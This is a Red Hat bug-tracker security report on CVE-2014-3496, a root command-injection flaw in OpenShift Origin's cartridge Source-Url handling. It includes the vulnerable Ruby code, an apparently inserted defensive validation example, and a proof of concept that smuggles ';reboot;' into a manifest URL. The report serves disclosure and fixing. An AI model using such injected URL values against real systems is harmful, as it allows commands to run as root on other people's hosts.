Bug 1110470 (CVE-2014-3496)

Summary: CVE-2014-3496 OpenShift Origin: Command execution as root via downloadable cartridge source-url
Product: [Other] Security Response
Reporter: Kurt Seifried <kseifried>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA
QA Contact:
Severity: urgent
Docs Contact:
Priority: urgent
Version: unspecified
CC: anli, bleanhar, ccoleman, dmcphers, jdetiber, jechoi, jhonce, jialiu, jkeck, jokerman, jrusnack, kseifried, lmeyer, mmccomas, mmcgrath, security-response-team
Target Milestone: ---
Keywords: Security
Target Release: ---
Hardware: All
OS: Linux
Whiteboard:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2014-06-18 20:53:41 UTC
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---
Target Upstream Version:
Embargoed:
Bug Depends On: 1110283, 1110472, 1110473, 1110474, 1110507
Bug Blocks: 1110862

Description Kurt Seifried 2014-06-17 18:36:30 UTC
Jeremy Choi of Red Hat reports:

OpenShift Origin does not properly validate the 'Source-Url' of cartridge manifest files used to create applications, so commands injected into it as below will be executed on the node.

  Source-Url: http://name-app.example.com/test/test;reboot;.tar.gz

Attacks can also succeed when the source URL ends with .zip, .tgz or .tar. The file specified in Source-Url must be available from the URL for a successful attack.

In cartridge_repository.rb:

498           temporary = PathUtils.join(File.dirname(target), File.basename(cartridge.source_url))
(deleted for brevity)
519             when uri.scheme =~ /^https*/ && cartridge.source_url =~ /(\.tar\.gz|\.tgz)$/
520               begin
521                 uri_copy(URI(cartridge.source_url), temporary, cartridge.source_md5)
522                 extract(:tgz, temporary, target)
523               ensure
524                 FileUtils.rm(temporary)
525               end
(deleted for brevity)
617       def self.extract(method, source, target)
618         case method
622           when :tgz
623             Utils.oo_spawn("/bin/tar -C #{target} -zxpf #{source}",
624                            expected_exitstatus: 0)


The system command execution in line 623 runs #{source}, which is built from cartridge.source_url. Although the source URL is validated in manifest.rb, ';' can still be injected.

370         if @manifest.has_key?('Source-Url')
371           raise InvalidElementError.new('Source-Url') unless @manifest['Source-Url'] =~ URI::ABS_URI
372           @source_url = @manifest['Source-Url']


The PoC below was demonstrated on Online devenv_4873.

1. Create a devenv.
2. Place a malformed manifest file with Source-Url modified on a host the devenv can access.

  Source-Url: http://<host>/test;reboot;.tar.gz

3. Create "test;reboot;.tar.gz" at the path of Source-Url in the host.
4. Try to create a cartridge with the malformed manifest.
    $ rhc app create app1 http://<host>/manifest.yml --no-git

The devenv will reboot.

Comment 2 Mike McGrath 2014-06-17 18:47:02 UTC
While fixing this, let's stop doing this download as root.

Comment 3 Kurt Seifried 2014-06-17 19:30:16 UTC
This has now leaked publicly: https://github.com/openshift/origin-server/pull/5521

Comment 4 Clayton Coleman 2014-06-17 19:41:16 UTC
A single-quoted argument around the source URL should also have been sufficient to prevent this (' and " are escaped in valid URLs).
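As an added defensive example (not code from origin-server, the report above, or comment 4), here is how the stricter Source-Url check the description calls for and the quoting suggested in comment 4 can be realised in Ruby: a validator that rejects what URI::ABS_URI lets through, tar built as an argv array so no shell ever parses the file name, and Shellwords.escape for the case where a single command string is kept. The function names, the allowed suffix list and the basename character set are assumptions.

```ruby
require 'uri'
require 'shellwords'

# Constructed defensive example; not the origin-server fix itself.
ALLOWED_SUFFIXES = %w[.tar.gz .tgz .tar .zip].freeze
# Archive file names may only use a conservative character set:
# no ';', '|', '$', '`', spaces or quotes can reach a command line.
SAFE_BASENAME = /\A[A-Za-z0-9][A-Za-z0-9._-]*\z/

class InvalidSourceUrl < StandardError; end

# Validate a Source-Url far more strictly than URI::ABS_URI does: that regex
# accepts ';' inside a URL path, which is exactly what let the metacharacters
# in the report's URL through. Returns the archive basename on success and
# raises InvalidSourceUrl otherwise.
def validate_source_url(url)
  uri = URI.parse(url.to_s)
  raise InvalidSourceUrl, 'scheme must be http or https' unless %w[http https].include?(uri.scheme)
  raise InvalidSourceUrl, 'host missing' if uri.host.nil? || uri.host.empty?
  name = File.basename(uri.path.to_s)
  raise InvalidSourceUrl, 'unsupported archive type' unless ALLOWED_SUFFIXES.any? { |s| name.end_with?(s) }
  raise InvalidSourceUrl, 'unsafe characters in file name' unless name.match?(SAFE_BASENAME)
  name
rescue URI::InvalidURIError
  raise InvalidSourceUrl, 'not a valid URI'
end

# The snippet in the report builds one shell string with #{source}, so the
# shell parses every metacharacter in the file name. An argv array never
# reaches a shell: Process.spawn / system treat each element as one literal
# argument, so ';' in the name is just part of the path handed to tar.
def tar_extract_argv(target, source)
  ['/bin/tar', '-C', target, '-zxpf', source]
end

# If a single command string is unavoidable, escape each operand so the
# shell sees the file name as one word (the quoting idea from comment 4).
def tar_extract_command(target, source)
  "/bin/tar -C #{Shellwords.escape(target)} -zxpf #{Shellwords.escape(source)}"
end
```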

Comment 5 Kurt Seifried 2014-06-17 23:38:39 UTC
Upgraded to critical due to authentication requirements; although auth is required, a common use case is to give out free testing accounts or other easily created accounts.

Comment 6 Martin Prpič 2014-06-18 07:57:49 UTC
Acknowledgements:

This issue was discovered by Jeremy Choi of the Red Hat HSS Pen-test Team.

Comment 7 errata-xmlrpc 2014-06-18 19:41:32 UTC
This issue has been addressed in the following products:

  RHEL 6 Version of OpenShift Enterprise 1.2

Via RHSA-2014:0762 https://rhn.redhat.com/errata/RHSA-2014-0762.html

Comment 8 errata-xmlrpc 2014-06-18 20:00:28 UTC
This issue has been addressed in the following products:

  RHEL 6 Version of OpenShift Enterprise 2.1

Via RHSA-2014:0764 https://rhn.redhat.com/errata/RHSA-2014-0764.html

Comment 9 errata-xmlrpc 2014-06-18 20:00:41 UTC
This issue has been addressed in the following products:

  RHEL 6 Version of OpenShift Enterprise 2.0

Via RHSA-2014:0763 https://rhn.redhat.com/errata/RHSA-2014-0763.html